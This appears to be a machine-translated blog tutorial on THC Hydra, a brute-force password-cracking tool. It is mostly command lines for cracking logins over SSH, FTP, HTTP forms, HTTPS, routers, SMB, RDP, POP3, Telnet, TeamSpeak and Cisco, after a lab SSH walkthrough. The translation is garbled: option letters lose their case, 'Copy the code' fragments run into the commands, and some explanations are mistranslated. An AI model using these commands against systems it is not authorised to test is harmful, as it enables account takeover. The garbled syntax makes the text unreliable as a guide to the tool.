Hydra hydra
Remember hydra, captain America’s villain?
This penetration testing tool introduced today is also called that.
Hydra is a well-known organization THC’s open source brute force password tools, very powerful
Kali is installed by default and supports online cracking of almost all protocols.
Whether a password can be cracked depends on the power of the dictionary and the performance of the computer.
Let’s just talk about how this thing works, okay
Method of use
Syntax: Hydra parameter IP serviceCopy the code
-l file Uppercase: indicates the user name dictionary of the specified user. -p pass Lowercase: indicates the password dictionary. The password dictionary is rarely used. -p file Uppercase, used to specify the password dictionary. -e ns Additional options: n: empty password test, s: use the specified account and password test. -m file Specifies the target IP address list file to crack in batches. -o file Specifies the output file. -f Stops cracking when the first pair of login names or passwords are found. -t Tasks Specifies the number of concurrent threads running. Default is 16. -w time Specifies the maximum timeout period in units -v / -v displays detailed processes. Run the hydra -r /path/to/hydra.restore command to continue the task next time.) -x Specifies the password.Copy the code
Service: specifies the name of the service. Supported services and protocols include Telnet, FTP, POP3, and so on. Note: 1. Create your own dictionary, and then put in the current directory or specified directory. 2. The parameters can be placed at the end in a format such as hydra IP service parameters. 3. If you can determine the user name, for example, to crack the web login, use -l to crack the password. 4. Disadvantages, if the target website login need verification code can not be cracked. 5. Man Hydra 6. Check the help information, such as hydra -u http-form.Copy the code
Case analysis
Break the SSH login password
Environment introduction
Hydra tool is installed on Kali target drone: 192.168.154.131 SSH service is installed and running properlyCopy the code
For testing purposes, we create two simple dictionary files, as follows:
Start blasting
According to the command parameters, the organization parameter format is as follows:
root@kali:/mnt# hydra -l user. TXT -p password. TXT -t 2 -vv -e ns 192.168.154.131 SSHCopy the code
Successful cracking
Because of the small number of dictionaries, we can easily crack it, but in practice, it may take a long time.
Test the login
Log in to the server using the obtained user name and password
All kinds of protocol cracking summary
FTP Protocol cracking
To crack FTP, run the hydra -l user name dictionary -p password dictionary -t 6 -e NS IP address -v commandCopy the code
HTTP Protocol cracking
Get submission to crack web login: Hydra -l User name dictionary -p password dictionary -t thread -v -e NS IP address http-get /admin/ Hydra -l User name dictionary -p password dictionary -t thread -v -e ns -f IP address http-get Hydra -f -l User name -p Password dictionary -v -s 9900 IP address http-post-form "/admin/index.php? Action = login: user = USER&pw = PASS: "# / index. PHP... This is the login URL # the backdoor is the POST data where the USER name and password are USER PASS instead of # and then the characters that will occur if the login fails... And started crackingCopy the code
HTTPS Protocol cracking
Decrypt HTTPS hydra -m /index.php -l user name -p Password dictionary. TXT IP address HTTPSCopy the code
Router cracking
hydra -l admin -x 6:10:1a.~! @#$%^&()-= -t 8 192.168.1.1 HTTP -get / -l admin is the user name to try to crack. # -x 6:10:1a. The enumerated password consists of digits, lowercase letters, single character '.', and so on, and is 6-10 characters long. -t 8 Indicates that eight parallel tasks are divided into eight blasting attempts. 192.168.1.1 is the Router address. Http-get is the cracking mode (protocol)Copy the code
The HTTP-proxy protocol is cracked
Decrypt http-proxy: hydra -l admin -p dictionary. TXT http-proxy://IP addressCopy the code
SMB crack
Crack SMB: hydra -l User name dictionary -p Password dictionary IP address SMBCopy the code
Windows Remote Desktop
Crack RDP (Windows Remote login) : Hydra IP address RDP -l administrator -p password dictionary. TXT -vCopy the code
Email pop3
Decrypt mailbox pop3: hydra -l user name -p Password dictionary. TXT my.pop3.mail pop3Copy the code
Telnet crack
Hydra IP address Telnet -l user dictionary TXT -p Password dictionary TXT -t 32 -s 23 -e ns -f -vCopy the code
Teamspeak
Hydra -l User name dictionary -p Password dictionary. TXT -s port number -vv IP teamspeakCopy the code
cisco
Hydra -p Password dictionary IP address Cisco Hydra -m cloud -p Password dictionary IP address cisco-enableCopy the code